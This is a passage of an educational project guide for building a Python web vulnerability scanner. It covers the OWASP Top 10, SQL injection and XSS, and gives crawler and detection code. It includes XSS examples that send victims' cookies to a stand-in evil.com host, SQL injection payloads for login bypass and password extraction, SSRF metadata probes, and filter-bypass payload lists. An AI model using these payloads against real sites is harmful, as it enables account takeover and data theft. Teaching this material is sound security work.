Project 2: Web Application Vulnerability Scanner
Project Overview
| Attribute | Value |
|---|---|
| Difficulty | Intermediate |
| Time Estimate | 2-3 weeks |
| Programming Language | Python |
| Primary Framework | OWASP Top 10 |
| Main Book | "Bug Bounty Bootcamp" by Vickie Li |
| Knowledge Area | Web Security |
Learning Objectives
By completing this project, you will:
- Master the OWASP Top 10 - Understand each vulnerability class deeply enough to detect and exploit them
- Understand HTTP at the protocol level - Request/response headers, cookies, sessions, and state management
- Build automated security testing - Design scanners that find real vulnerabilities
- Learn attack surface discovery - Crawl applications to identify all input points
- Develop responsible disclosure skills - Report findings professionally with evidence
The Core Question
"How do web application scanners automatically find vulnerabilities that developers miss?"
Web applications are among the most exposed attack surfaces in modern organizations. Building your own scanner teaches you:
- Why certain coding patterns create vulnerabilities
- How injection attacks actually work at the request/response level
- What distinguishes a false positive from a true positive
- The difference between automated scanning and skilled manual testing
Deep Theoretical Foundation
The HTTP Protocol: Your Attack Surface
Every web vulnerability is exploited through HTTP requests and responses, so you need to understand the protocol intimately:
HTTP REQUEST ANATOMY
────────────────────
POST /login HTTP/1.1                              ←── Request Line
Host: vulnerable-app.com                          ←── Headers begin
User-Agent: Mozilla/5.0 (Windows NT 10.0)
Accept: text/html,application/xhtml+xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Cookie: session=abc123; tracking=xyz789           ←── Cookies (session state)
Connection: close
                                                  ←── Blank line separates headers/body
username=admin&password=secret123                 ←── Request Body (POST data)

HTTP RESPONSE ANATOMY
─────────────────────
HTTP/1.1 200 OK                                   ←── Status Line
Date: Sat, 27 Dec 2025 12:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)                    ←── Information disclosure!
X-Powered-By: PHP/7.4.3                           ←── More info disclosure!
Set-Cookie: session=def456; HttpOnly; Secure      ←── New session cookie
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
                                                  ←── Blank line
<!DOCTYPE html>                                   ←── Response Body
<html>
<head><title>Welcome Admin</title></head>         ←── May reveal successful login
<body>...
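To make the request anatomy above concrete, here is a minimal sketch that splits a raw HTTP/1.1 request into its request line, headers, and body. The function name `parse_http_request` is an illustrative assumption, and the parser ignores edge cases such as folded headers or repeated header names.

```python
def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into request line, headers, and body."""
    # The first blank line (CRLF CRLF) separates the headers from the body
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


raw_request = (
    "POST /login HTTP/1.1\r\n"
    "Host: vulnerable-app.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 33\r\n"
    "Cookie: session=abc123; tracking=xyz789\r\n"
    "\r\n"
    "username=admin&password=secret123"
)
parsed = parse_http_request(raw_request)
```

Every field in `parsed` (target, each header, each cookie, each body parameter) is a place where a scanner can inject a payload.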
Where Vulnerabilities Live
Web applications have multiple layers, each with unique attack surfaces:
WEB APPLICATION STACK (Attack Surface at Every Layer)
─────────────────────────────────────────────────────

CLIENT SIDE (Browser)
  JavaScript
    • XSS attacks execute here
    • DOM manipulation
  Local Storage
    • Sensitive data exposure
    • No HttpOnly protection
  Cookies
    • Session hijacking
    • CSRF tokens
    • Missing Secure flag
        │
        │ HTTP Request
        ▼
WEB SERVER (nginx, Apache, IIS)
    • Security headers (CSP, X-Frame-Options)
    • TLS configuration (HTTPS)
    • Directory listings
    • Server version disclosure
        │
        ▼
APPLICATION LAYER (PHP, Python, Node.js, Java)
  INPUT HANDLING
    URL Parameters: /page?id=1       → SQL Injection
    POST Data:      username=admin   → Auth Bypass
    Headers:        User-Agent: ...  → Log Injection
    Cookies:        role=user        → Privilege Escalation
    File Uploads:   image.php.jpg    → Remote Code Execution
    JSON/XML:       {"user":"..."}   → XXE, Deserialization
  BUSINESS LOGIC
    • IDOR (Insecure Direct Object Reference)
      GET /api/users/123 → Change to /api/users/124
    • Authorization flaws
      User can access admin functions
    • Race conditions
      Submit payment twice quickly
        │
        ▼
DATABASE LAYER
    • SQL Injection (SELECT * FROM users WHERE id='$input')
    • NoSQL Injection (MongoDB query operators)
    • Stored XSS (malicious data in database)
    • Credential exposure (passwords in plaintext)

OWASP Top 10 2021: What Your Scanner Must Find
┌──────────────────────────────────────────────────┐
│     OWASP TOP 10 2021 VULNERABILITY CLASSES      │
└──────────────────────────────────────────────────┘
[A01] BROKEN ACCESS CONTROL
───────────────────────────
What: Users can access resources they shouldn't
How to test:
  1. Change ?user_id=123 to ?user_id=124
  2. Access /admin without admin role
  3. Modify hidden form fields (role=admin)
  4. Bypass authentication via direct URL
Scanner Detection:
  ├── Test IDOR by incrementing/decrementing IDs
  ├── Access restricted paths without authentication
  └── Modify request parameters and observe response changes

[A02] CRYPTOGRAPHIC FAILURES
────────────────────────────
What: Sensitive data exposed due to weak/missing encryption
How to test:
  1. Check for HTTP (not HTTPS)
  2. Analyze password storage (MD5, plaintext visible)
  3. Look for sensitive data in responses
Scanner Detection:
  ├── Flag any non-HTTPS login pages
  ├── Check for password/credit card in response bodies
  └── Analyze Set-Cookie for missing Secure flag

[A03] INJECTION (SQL, Command, LDAP)
────────────────────────────────────
What: Untrusted data sent to interpreter as part of command
How to test:
  1. Add ' to inputs, look for SQL errors
  2. Try SQL payloads: ' OR '1'='1
  3. Test for command injection: ; ls -la
  4. LDAP injection: )(uid=*)
Scanner Detection:
  ├── Inject ' and " in all parameters
  ├── Analyze error messages for SQL syntax errors
  ├── Use time-based payloads: ' AND SLEEP(5)--
  └── Look for command output in responses

[A04] INSECURE DESIGN
─────────────────────
What: Missing security controls, flawed architecture
How to test:
  1. Check for rate limiting (brute force possible?)
  2. Review password reset flow
  3. Look for missing CAPTCHA
Scanner Detection:
  ├── Send 100 requests rapidly, check for rate limiting
  ├── Test password reset token predictability
  └── Note: Many design flaws need manual review

[A05] SECURITY MISCONFIGURATION
───────────────────────────────
What: Insecure default configs, unnecessary features
How to test:
  1. Check for default credentials
  2. Look for exposed admin interfaces
  3. Directory listing enabled?
  4. Stack traces in errors?
Scanner Detection:
  ├── Access /admin, /phpmyadmin, /wp-admin
  ├── Trigger errors, check for verbose messages
  ├── Test for directory listing: /images/
  └── Check common default credentials

[A06] VULNERABLE COMPONENTS
───────────────────────────
What: Using libraries with known CVEs
How to test:
  1. Identify framework/library versions
  2. Check against CVE databases
  3. Look for outdated JavaScript libraries
Scanner Detection:
  ├── Parse Server header for versions
  ├── Check JavaScript libraries against retire.js
  └── Identify framework from response patterns

[A07] AUTHENTICATION FAILURES
─────────────────────────────
What: Broken login, session management
How to test:
  1. Brute force with common passwords
  2. Session fixation attacks
  3. Session timeout (do sessions expire?)
Scanner Detection:
  ├── Try admin:admin, admin:password
  ├── Check if session ID changes after login
  ├── Look for session ID in URL (bad practice)
  └── Test remember-me token security

[A08] DATA INTEGRITY FAILURES
─────────────────────────────
What: Software updates without verification
How to test:
  1. Check for unsigned updates
  2. Look for insecure deserialization
Scanner Detection:
  ├── Limited automated testing
  └── Flag if application loads external resources

[A09] LOGGING/MONITORING FAILURES
─────────────────────────────────
What: Attacks go undetected
How to test:
  1. Trigger suspicious activity
  2. Check if you're blocked after failed logins
Scanner Detection:
  ├── Multiple failed logins - are you blocked?
  └── Note: Primarily manual review

[A10] SSRF (Server-Side Request Forgery)
────────────────────────────────────────
What: Server makes requests to attacker-controlled destinations
How to test:
  1. Find URL input parameters
  2. Try ?url=http://169.254.169.254 (AWS metadata)
  3. Try ?url=http://localhost:8080
Scanner Detection:
  ├── Inject URLs pointing to known callback server
  ├── Try cloud metadata URLs
  └── Test for internal port scanning via SSRF
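
Many of the checks above reduce to small pure functions over a response. As one example, the A02 item "Analyze Set-Cookie for missing Secure flag" could be sketched as follows. The function name `audit_set_cookie` and the wording of the issue strings are assumptions for illustration, and the sketch only looks at the `Secure` and `HttpOnly` attributes.

```python
from typing import List


def audit_set_cookie(header_value: str) -> List[str]:
    """Return a list of issues for one Set-Cookie header value."""
    parts = [part.strip() for part in header_value.split(";")]
    cookie_name = parts[0].split("=", 1)[0]
    # Attribute names are case-insensitive, so normalise them to lower case
    attributes = {part.split("=", 1)[0].lower() for part in parts[1:] if part}
    issues = []
    if "secure" not in attributes:
        issues.append(f"{cookie_name}: missing Secure flag")
    if "httponly" not in attributes:
        issues.append(f"{cookie_name}: missing HttpOnly flag")
    return issues


good = audit_set_cookie("session=def456; HttpOnly; Secure")
bad = audit_set_cookie("tracking=xyz789; Path=/")
```

Keeping detection logic free of network calls like this makes it easy to unit test against canned header values.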
SQL Injection Deep Dive
SQL injection remains prevalent because the mistake is easy to make and hard to detect automatically:

NORMAL LOGIN QUERY
──────────────────
User Input:
  username: alice
  password: secret123
Application Code (VULNERABLE):
  query = "SELECT * FROM users WHERE username='" + username +
          "' AND password='" + password + "'"
Resulting Query:
  SELECT * FROM users WHERE username='alice' AND password='secret123'
Result: Only returns Alice's record if password matches

SQL INJECTION ATTACK
────────────────────
User Input:
  username: admin' --
  password: anything
Resulting Query:
  SELECT * FROM users WHERE username='admin' --' AND password='anything'
                                             ↑
                                  This is a SQL comment!
                                  Everything after is ignored
Actual Query Executed:
  SELECT * FROM users WHERE username='admin'
Result: Returns admin account WITHOUT password check!

UNION-BASED DATA EXTRACTION
───────────────────────────
URL: /products?id=5
Normal Query:
  SELECT name, price, description FROM products WHERE id=5
Attack URL: /products?id=5 UNION SELECT username,password,email FROM users--
Resulting Query:
  SELECT name, price, description FROM products WHERE id=5
  UNION
  SELECT username, password, email FROM users--
Result: Page displays ALL usernames, passwords, and emails!

TIME-BASED BLIND SQL INJECTION
──────────────────────────────
When no visible output exists, measure response time:
Attack: /products?id=5' AND SLEEP(5)--
If the page takes 5+ seconds to load:
  → SQL injection confirmed!
  → Database is processing the SLEEP() command
Extracting data character by character:
  /products?id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
  If response takes 5 seconds → First char of database name is 'a'
  If response is instant → First char is NOT 'a', try 'b', 'c', etc.
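
The login bypass above can be reproduced locally with an in-memory SQLite database. This is a sketch under assumptions: the table contents and the function names `login_vulnerable` and `login_safe` are made up for the demonstration, and SQLite stands in for whatever database a real target uses.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('alice', 'secret123')")


def login_vulnerable(username: str, password: str) -> list:
    # String concatenation lets the input rewrite the query structure
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchall()


def login_safe(username: str, password: str) -> list:
    # Placeholders keep the input as data; it is never parsed as SQL
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchall()


bypass = login_vulnerable("admin' --", "anything")   # password check commented out
blocked = login_safe("admin' --", "anything")        # no user has this literal name
```

The same payload that logs in as `admin` through the concatenated query returns no rows through the parameterized one, which is why the recommended fix for SQL injection findings is prepared statements rather than input filtering.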
Cross-Site Scripting (XSS) Explained
XSS ATTACK TYPES
────────────────

REFLECTED XSS (Non-Persistent)
──────────────────────────────
Attack URL sent to victim via phishing:
  https://vulnerable.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
Server reflects input in response:
  <h1>Search results for: <script>document.location='...'</script></h1>
Browser executes the script → Cookies stolen!

STORED XSS (Persistent)
───────────────────────
Attacker posts comment:
  Great product! <script>document.location='https://evil.com/steal?c='+document.cookie</script>
Comment saved in database, displayed to ALL users who view page
Every visitor's cookies are stolen automatically

DOM-BASED XSS
─────────────
Vulnerable JavaScript:
  document.getElementById('output').innerHTML = location.hash.substring(1);
Attack URL:
  https://vulnerable.com/page#<img src=x onerror=alert(document.cookie)>
Script never goes to server - executes entirely client-side

XSS PAYLOADS FOR TESTING
────────────────────────
Basic:
  <script>alert('XSS')</script>
Event handlers:
  <img src=x onerror=alert('XSS')>
  <body onload=alert('XSS')>
  <svg onload=alert('XSS')>
Filter bypasses:
  <ScRiPt>alert('XSS')</ScRiPt>                            # Case variation
  <script>alert(String.fromCharCode(88,83,83))</script>    # Char codes
  <img src=x onerror="&#97;lert('XSS')">                   # HTML entities
  <script>eval(atob('YWxlcnQoJ1hTUycp'))</script>          # Base64
Context-aware:
  In attribute:  " onmouseover="alert('XSS')
  In JavaScript: ';alert('XSS');//
  In URL:        javascript:alert('XSS')
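
The reflected case above comes down to whether the server encodes user input before writing it into HTML. The sketch below contrasts the two behaviours using the standard library's `html.escape`. The function names are hypothetical stand-ins for a server-side template, and the escaping shown only covers the HTML body and quoted-attribute contexts.

```python
import html


def render_unsafe(query: str) -> str:
    # Input is written into the page verbatim: reflected XSS
    return f"<h1>Search results for: {query}</h1>"


def render_escaped(query: str) -> str:
    # html.escape turns <, >, &, and quotes into entities, so the
    # browser displays the payload as text instead of executing it
    return f"<h1>Search results for: {html.escape(query, quote=True)}</h1>"


payload = "<script>alert('XSS')</script>"
unsafe_page = render_unsafe(payload)
escaped_page = render_escaped(payload)
```

This is also what the scanner has to distinguish: a payload that comes back byte-for-byte is a candidate finding, while one that comes back as `&lt;script&gt;` is not.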
Project Specification
What You're Building
A modular web vulnerability scanner with the following structure:
web-vuln-scanner/
├── scanner.py              # Main scanner orchestrator
├── crawler.py              # Web crawler for attack surface discovery
├── modules/
│   ├── __init__.py
│   ├── sqli.py             # SQL injection tests
│   ├── xss.py              # XSS tests
│   ├── idor.py             # IDOR/access control tests
│   ├── ssrf.py             # SSRF tests
│   ├── headers.py          # Security headers analysis
│   └── disclosure.py       # Information disclosure tests
├── payloads/
│   ├── sqli.txt            # SQL injection payloads
│   ├── xss.txt             # XSS payloads
│   └── wordlists/          # Directory brute-force lists
├── reports/
│   └── templates/
│       └── report.html     # HTML report template
├── requirements.txt
└── README.md
Functional Requirements
1. Web Crawler (crawler.py)
Must implement:
- Start from seed URL, discover all pages
- Extract forms (action URL, method, input fields)
- Extract links (href, src)
- Respect robots.txt (optional override)
- Handle relative and absolute URLs
- Track visited URLs to avoid loops
Should implement:
- JavaScript rendering (Selenium/Playwright)
- API endpoint discovery
- Handle authentication (cookie jar)
- Rate limiting
Output: List of pages with their forms and parameters
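
Three of the crawler requirements above (stay on the seed host, respect robots.txt, avoid revisiting URLs) can be combined into a single gate that runs before a URL is queued. This is a sketch: `build_robots` and `should_crawl` are hypothetical helper names, and the robots rules are passed in as lines so the example runs without network access. In a real crawler you would fetch `/robots.txt` from the target first.

```python
from typing import Iterable, Set
from urllib.parse import urldefrag, urlparse
from urllib.robotparser import RobotFileParser


def build_robots(lines: Iterable[str]) -> RobotFileParser:
    """Build a robots.txt parser from already-fetched lines."""
    parser = RobotFileParser()
    parser.parse(lines)
    return parser


def should_crawl(url: str, seed_url: str, robots: RobotFileParser,
                 visited: Set[str], user_agent: str = "*") -> bool:
    url, _fragment = urldefrag(url)  # "#section" never reaches the server
    if urlparse(url).netloc != urlparse(seed_url).netloc:
        return False  # Out of scope: different host
    if url in visited:
        return False  # Already crawled
    return robots.can_fetch(user_agent, url)


robots = build_robots(["User-agent: *", "Disallow: /admin/"])
seed = "https://target.com"
```

For example, `should_crawl("https://target.com/admin/users", seed, robots, set())` is rejected by the robots rule, which is where the "optional override" requirement would add a flag to skip the last check.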
2. SQL Injection Scanner (modules/sqli.py)
Must implement:
- Error-based detection (look for SQL errors in response)
- Boolean-based detection (compare true/false responses)
- Time-based detection (measure response delays)
- Test all parameter types (GET, POST, cookies)
Should implement:
- UNION-based exploitation
- Identify database type (MySQL, PostgreSQL, MSSQL)
- Extract table names
- Payload encoding for WAF bypass
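
Boolean-based detection is the least obvious of the three required techniques, so here is a minimal sketch of the comparison logic. It assumes a caller-supplied `fetch` function that takes a parameter value and returns the response body, and a similarity threshold of 0.95. Both are illustrative choices, not fixed parts of the project.

```python
from difflib import SequenceMatcher
from typing import Callable


def similarity(a: str, b: str) -> float:
    """Ratio in [0, 1]; 1.0 means the two bodies are identical."""
    return SequenceMatcher(None, a, b).ratio()


def looks_boolean_injectable(fetch: Callable[[str], str], original: str,
                             threshold: float = 0.95) -> bool:
    baseline = fetch(original)
    true_body = fetch(f"{original}' AND '1'='1")    # condition always true
    false_body = fetch(f"{original}' AND '1'='2")   # condition always false
    # Injectable if the TRUE payload behaves like the baseline
    # while the FALSE payload produces a noticeably different page
    return (similarity(baseline, true_body) >= threshold
            and similarity(baseline, false_body) < threshold)


def fake_vulnerable_fetch(value: str) -> str:
    # Stand-in for a page whose query result depends on the injected condition
    if "'1'='2" in value:
        return "No products found"
    return "Product: Widget - $9.99 - In stock"


def fake_safe_fetch(value: str) -> str:
    # Stand-in for a page that treats the whole value as data
    return "No products found"
```

Comparing by similarity rather than equality tolerates pages that contain timestamps or CSRF tokens, at the cost of a threshold you will need to tune per target.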
3. XSS Scanner (modules/xss.py)
Must implement:
- Reflected XSS detection
- Multiple context detection (HTML, attribute, JavaScript)
- Basic filter bypass payloads
Should implement:
- Stored XSS detection (check if payload persists)
- DOM-based XSS detection
- Custom payload generation based on context
4. IDOR Scanner (modules/idor.py)
Must implement:
- Detect numeric ID parameters
- Test ID manipulation (increment/decrement)
- Compare responses for different IDs
Should implement:
- UUID/GUID manipulation
- Test with different user sessions
5. Security Headers Analyzer (modules/headers.py)
Must check for:
- Content-Security-Policy
- X-Content-Type-Options
- X-Frame-Options
- Strict-Transport-Security
- X-XSS-Protection
- Server/X-Powered-By disclosure
6. Report Generator
Must implement:
- JSON output for tool integration
- HTML report with findings, evidence, recommendations
- Severity ratings (Critical, High, Medium, Low)
- Screenshots/evidence storage
Solution Architecture
Component Design
┌───────────────────────────────────────────────────────┐
│               WEB VULNERABILITY SCANNER               │
└───────────────────────────┬───────────────────────────┘
                            │
                            ▼
                  ┌───────────────────┐
                  │   Orchestrator    │
                  │   (scanner.py)    │
                  ├───────────────────┤
                  │ - Load config     │
                  │ - Initialize      │
                  │ - Coordinate      │
                  │ - Generate report │
                  └─────────┬─────────┘
                            │
        ┌───────────────────┼───────────────────┐
        │                   │                   │
        ▼                   ▼                   ▼
┌───────────────┐   ┌───────────────┐   ┌───────────────┐
│    Crawler    │   │    Modules    │   │   Reporter    │
├───────────────┤   ├───────────────┤   ├───────────────┤
│ - Discover    │   │ - SQLi        │   │ - Format      │
│   pages       │──►│ - XSS         │──►│   findings    │
│ - Extract     │   │ - IDOR        │   │ - Generate    │
│   forms       │   │ - Headers     │   │   HTML/JSON   │
│ - Map attack  │   │ - SSRF        │   │ - Severity    │
│   surface     │   │               │   │   rating      │
└───────────────┘   └───────────────┘   └───────────────┘
Key Data Structures
from dataclasses import dataclass
from typing import List, Optional

# Parameter, FormInput, and Form are defined before CrawlResult because
# CrawlResult refers to them in its field annotations.

@dataclass
class Parameter:
    name: str
    value: str
    location: str        # query, body, cookie, header
    param_type: str      # string, numeric, email, etc.

@dataclass
class FormInput:
    name: str
    input_type: str      # text, password, hidden, etc.
    value: Optional[str]

@dataclass
class Form:
    action: str
    method: str
    inputs: List[FormInput]

@dataclass
class CrawlResult:
    url: str
    method: str          # GET, POST
    parameters: List[Parameter]
    forms: List[Form]
    response_code: int

@dataclass
class Vulnerability:
    vuln_type: str       # sqli, xss, idor, etc.
    severity: str        # critical, high, medium, low
    url: str
    parameter: str
    payload: str
    evidence: str
    reproduction_steps: List[str]
    recommendation: str
Testing Flow
SCANNER WORKFLOW
────────────────

1. CRAWLING PHASE
   Start URL: https://target.com

   → Visit page
   → Extract links: /login, /products, /about
   → Extract forms: login form, search form
   → Queue new URLs for crawling
   → Repeat until all URLs visited

   Result: Attack surface map
   - 50 unique pages
   - 12 forms
   - 85 parameters

2. TESTING PHASE
   For each parameter in attack surface:

   SQLi Module:
   - Inject ' and " → Check for SQL errors
   - Try boolean payloads → Compare responses
   - Try time-based → Measure delays

   XSS Module:
   - Inject <script>alert(1)</script>
   - Check if payload appears in response
   - Test multiple contexts

   IDOR Module:
   - If numeric ID found, try adjacent values
   - Compare response content

   ...repeat for each module...

3. REPORTING PHASE
   Aggregate all findings:
   - Critical: 2 SQLi vulnerabilities
   - High: 5 XSS vulnerabilities
   - Medium: 3 IDOR issues
   - Low: 8 missing security headers

   Generate report with:
   - Executive summary
   - Technical details for each finding
   - Reproduction steps
   - Recommendations

Phased Implementation Guide
Phase 1: HTTP Client and Crawler Foundation (Days 1-3)
Goal: Crawl a simple website and extract all forms
Implementation steps:
1. Create HTTP session wrapper:
```python
import requests
from urllib.parse import urljoin, urlparse


class WebSession:
    """Thin wrapper around requests.Session that resolves URLs against a base."""

    def __init__(self, base_url: str, timeout: int = 10):
        self.session = requests.Session()  # Persists cookies across requests
        self.base_url = base_url
        self.timeout = timeout
        self.visited = set()  # URLs already crawled

    def get(self, url: str) -> requests.Response:
        full_url = urljoin(self.base_url, url)
        return self.session.get(full_url, timeout=self.timeout)

    def post(self, url: str, data: dict) -> requests.Response:
        full_url = urljoin(self.base_url, url)
        return self.session.post(full_url, data=data, timeout=self.timeout)
```
2. Implement HTML parser for links and forms:
```python
from typing import List
from urllib.parse import urljoin, urlparse

from bs4 import BeautifulSoup


def extract_links(html: str, base_url: str) -> List[str]:
    soup = BeautifulSoup(html, "html.parser")
    links = []
    for a in soup.find_all("a", href=True):
        link = urljoin(base_url, a["href"])
        # Stay in scope: keep only links on the same host as the base URL
        if urlparse(link).netloc == urlparse(base_url).netloc:
            links.append(link)
    return links


def extract_forms(html: str, base_url: str) -> List[Form]:
    # Form and FormInput are the dataclasses from "Key Data Structures"
    soup = BeautifulSoup(html, "html.parser")
    forms = []
    for form in soup.find_all("form"):
        action = urljoin(base_url, form.get("action", ""))
        method = form.get("method", "get").upper()
        inputs = []
        for inp in form.find_all(["input", "textarea", "select"]):
            inputs.append(FormInput(
                name=inp.get("name", ""),
                input_type=inp.get("type", "text"),
                value=inp.get("value", ""),
            ))
        forms.append(Form(action, method, inputs))
    return forms
```
3. Implement BFS crawler:
```python
from collections import deque
from typing import List


def crawl(start_url: str, max_pages: int = 100) -> List[CrawlResult]:
    session = WebSession(start_url)
    queue = deque([start_url])
    results = []
    while queue and len(results) < max_pages:
        url = queue.popleft()
        if url in session.visited:
            continue
        session.visited.add(url)
        try:
            response = session.get(url)
            links = extract_links(response.text, url)
            forms = extract_forms(response.text, url)
            params = extract_url_params(url)
            results.append(CrawlResult(url, 'GET', params, forms, response.status_code))
            # Breadth-first: newly found links go to the back of the queue
            for link in links:
                if link not in session.visited:
                    queue.append(link)
        except Exception as e:
            print(f"Error crawling {url}: {e}")
    return results
```
Verification: Crawl DVWA or OWASP WebGoat and list all discovered forms
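
The crawler calls `extract_url_params`, which this guide does not define. One possible sketch is below. The `Parameter` dataclass is repeated from "Key Data Structures" so the block runs on its own, and the numeric/string classification is a simplifying assumption (the data structure comment also mentions types such as email).

```python
from dataclasses import dataclass
from typing import List
from urllib.parse import parse_qsl, urlparse


@dataclass
class Parameter:
    name: str
    value: str
    location: str     # query, body, cookie, header
    param_type: str   # string, numeric, email, etc.


def extract_url_params(url: str) -> List[Parameter]:
    """Turn the query string of a URL into Parameter records."""
    params = []
    # keep_blank_values=True so that "?debug=" is still recorded as an input
    for name, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        param_type = "numeric" if value.isdigit() else "string"
        params.append(Parameter(name, value, "query", param_type))
    return params


found = extract_url_params("https://target.com/products?id=5&q=shoes&debug=")
```

Tagging numeric parameters at crawl time pays off later, since the IDOR module only needs to look at parameters whose `param_type` is `"numeric"`.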
Phase 2: SQL Injection Module (Days 3-6)
Goal: Detect SQL injection in any parameter
Implementation steps:
1. Create payload injection framework:
```python
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse

import requests


def inject_parameter(session: WebSession, url: str, param: str,
                     payload: str, method: str = 'GET') -> requests.Response:
    """Inject payload into specific parameter"""
    if method == 'GET':
        # Rebuild the query string with the target parameter replaced
        parsed = urlparse(url)
        params = parse_qs(parsed.query, keep_blank_values=True)
        params[param] = [payload]
        new_query = urlencode(params, doseq=True)
        new_url = parsed._replace(query=new_query).geturl()
        return session.get(new_url)
    # Otherwise send the payload in the POST body
    return session.post(url, data={param: payload})
```
2. Implement error-based detection:
```python
SQL_ERRORS = [
    "you have an error in your sql syntax",
    "warning: mysql",
    "unclosed quotation mark",
    "quoted string not properly terminated",
    "sqlexception",
    "microsoft ole db provider for sql server",
    "postgresql query failed",
    "syntax error at or near",
]


def test_sqli_error_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]:
    payloads = ["'", '"', "' OR '1'='1", "1' AND '1'='1"]
    for payload in payloads:
        response = inject_parameter(session, url, param, payload)
        body = response.text.lower()  # Signatures are lowercase; compare case-insensitively
        for error in SQL_ERRORS:
            if error in body:
                return Vulnerability(
                    vuln_type="SQL Injection (Error-based)",
                    severity="critical",
                    url=url,
                    parameter=param,
                    payload=payload,
                    evidence=f"SQL error found: {error}",
                    reproduction_steps=[
                        f"1. Navigate to {url}",
                        f"2. Set parameter {param} to: {payload}",
                        "3. Observe SQL error in response",
                    ],
                    recommendation="Use parameterized queries/prepared statements",
                )
    return None
```
3. Implement time-based detection:
```python
import time


def test_sqli_time_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]:
    delay = 5  # seconds
    payloads = [
        f"' AND SLEEP({delay})--",             # MySQL
        f"'; WAITFOR DELAY '0:0:{delay}'--",   # MSSQL
        f"' AND pg_sleep({delay})--",          # PostgreSQL
    ]
    # First, get baseline response time
    start = time.time()
    session.get(url)
    baseline = time.time() - start
    for payload in payloads:
        start = time.time()
        inject_parameter(session, url, param, payload)
        elapsed = time.time() - start
        if elapsed >= baseline + delay - 0.5:  # Allow 0.5s tolerance
            return Vulnerability(
                vuln_type="SQL Injection (Time-based Blind)",
                severity="critical",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"Response delayed by {elapsed:.1f}s (expected {delay}s)",
                reproduction_steps=[...],
                recommendation="Use parameterized queries/prepared statements",
            )
    return None
```
Verification: Detect SQLi in DVWA with security level "low"
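
A single baseline request makes time-based detection fragile, because one slow response can hide or fake a delay. A more robust decision rule, sketched below, takes several timing samples for both the baseline and the injected request. The function name and the choice of median and minimum are assumptions for illustration, not the only reasonable statistics.

```python
import statistics
from typing import Sequence


def is_time_delay_significant(baseline_samples: Sequence[float],
                              injected_samples: Sequence[float],
                              delay: float,
                              tolerance: float = 0.5) -> bool:
    """Decide whether injected requests were consistently delayed."""
    # The median ignores a single unusually slow baseline request
    baseline = statistics.median(baseline_samples)
    # Using the fastest injected sample means EVERY repeat must show the delay
    return min(injected_samples) >= baseline + delay - tolerance


consistent = is_time_delay_significant([0.2, 0.25, 3.0], [5.3, 5.2], delay=5)
one_off = is_time_delay_significant([0.2, 0.3, 0.25], [5.4, 0.3], delay=5)
```

Here `consistent` is a finding even though one baseline sample was slow, while `one_off` is rejected because the delay did not reproduce on the second injected request.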
Phase 3: XSS Module (Days 6-9)
Goal: Detect reflected XSS vulnerabilities
Implementation steps:
1. Create XSS payload generator:
```python
import random

XSS_PAYLOADS = [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '"><script>alert(1)</script>',
    "'-alert(1)-'",
    '<svg onload=alert(1)>',
]


# Random marker to detect reflection
def generate_xss_marker():
    return f"xss{random.randint(10000, 99999)}"
```
2. Implement reflection detection:
```python
from typing import List

from bs4 import BeautifulSoup


def test_xss_reflected(session: WebSession, url: str, param: str) -> List[Vulnerability]:
    vulnerabilities = []
    for payload in XSS_PAYLOADS:
        response = inject_parameter(session, url, param, payload)
        # Check if payload is reflected unencoded
        if payload in response.text:
            # Determine context
            context = determine_xss_context(response.text, payload)
            vulnerabilities.append(Vulnerability(
                vuln_type=f"Reflected XSS ({context})",
                severity="high",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"Payload reflected in {context} context",
                reproduction_steps=[
                    f"1. Navigate to {url}",
                    f"2. Set parameter {param} to: {payload}",
                    "3. Observe JavaScript execution",
                ],
                recommendation="Encode output based on context (HTML, JS, URL)",
            ))
            break  # Found XSS, no need to test more payloads
    return vulnerabilities


def determine_xss_context(html: str, payload: str) -> str:
    """Determine where payload landed in HTML"""
    soup = BeautifulSoup(html, 'html.parser')
    # Check if in script tag
    for script in soup.find_all('script'):
        if payload in script.text:
            return "JavaScript"
    # Check if in attribute
    for tag in soup.find_all():
        for attr, value in tag.attrs.items():
            if isinstance(value, str) and payload in value:
                return f"Attribute ({attr})"
    return "HTML body"
```
3. Add filter bypass payloads:
```python
XSS_BYPASS_PAYLOADS = [
    # Case variation
    '<ScRiPt>alert(1)</ScRiPt>',
    # Event handlers
    '<img src=x onerror=alert(1)>',
    '<body onload=alert(1)>',
    # Unicode encoding
    '<script>alert\u0028\u0031\u0029</script>',
    # Double encoding
    '%253Cscript%253Ealert(1)%253C/script%253E',
]
```
Verification: Detect XSS in DVWA and OWASP WebGoat
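
Before sending full payloads, a scanner can send a harmless probe that wraps the characters XSS depends on between two copies of a random marker, then check which of them come back unencoded. The sketch below shows that idea. `build_probe`, `surviving_chars`, and the probe character set are hypothetical choices, and the marker uses `secrets.token_hex` rather than the random integer shown earlier.

```python
import html
import secrets

PROBE_CHARS = "<>\"'"  # Characters an HTML or attribute breakout needs


def build_probe() -> tuple:
    """Return (marker, probe) where probe is marker + special chars + marker."""
    marker = "xss" + secrets.token_hex(4)
    return marker, f"{marker}{PROBE_CHARS}{marker}"


def surviving_chars(body: str, marker: str) -> str:
    """Return the probe characters that were reflected without encoding."""
    start = body.find(marker)
    if start == -1:
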